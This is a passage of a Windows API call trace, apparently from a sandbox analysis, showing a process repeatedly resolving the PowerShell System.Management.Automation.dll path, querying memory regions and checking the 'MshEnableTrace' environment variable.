lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0074.800] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.800] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.800] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.800] CoTaskMemFree (pv=0x3e43c0) [0074.801] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.810] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.810] CoTaskMemFree (pv=0x3e43c0) [0074.811] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.811] CoTaskMemFree (pv=0x3e43c0) [0074.811] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.811] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.811] CoTaskMemFree (pv=0x3e43c0) [0074.812] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.812] CoTaskMemFree (pv=0x3e43c0) [0074.814] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.814] CoTaskMemFree (pv=0x3e43c0) [0074.814] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.814] CoTaskMemFree (pv=0x3e43c0) [0074.816] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.817] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.878] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0074.882] CoTaskMemAlloc (cb=0x104) returned 0x3e43c0 [0074.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e43c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0074.882] CoTaskMemFree (pv=0x3e43c0) [0075.866] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3e4800 [0075.868] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3e4910 [0076.046] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.368] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.370] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.370] VirtualQuery (in: lpAddress=0x1aa2c0, lpBuffer=0x1ab180, dwLength=0x30 | out: lpBuffer=0x1ab180*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.418] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.419] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.420] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.420] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.420] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.420] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.420] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.420] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.420] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.420] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.420] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.420] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.421] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.421] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.421] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.421] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.421] VirtualQuery (in: lpAddress=0x1ab870, lpBuffer=0x1ac730, dwLength=0x30 | out: lpBuffer=0x1ac730*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.424] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.424] CoTaskMemFree (pv=0x3e4a20) [0077.429] CoTaskMemAlloc (cb=0x104) returned 0x3e4a20 [0077.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e4a20, nSize=0x80 | out: lpBuffer="") returned 0x0 [0077.429] CoTaskMemFree (pv=0x3e4a20) [0077.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.475] VirtualQuery (in: lpAddress=0x1abb20, lpBuffer=0x1ac9e0, dwLength=0x30 | out: lpBuffer=0x1ac9e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.476] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0077.476] VirtualQuery (in: lpAddress=0x1abb20, lpBuffer=0x1ac9e0, dwLength=0x30 | out: lpBuffer=0x1ac9e0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.476] VirtualQuery (in: lpAddress=0x1ab370, lpBuffer=0x1ac230, dwLength=0x30 | out: lpBuffer=0x1ac230*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0077.476] VirtualQuery (in: lpAddress=0x1ab370, lpBuffer=0x1ac230, dwLength=0x30 | out: 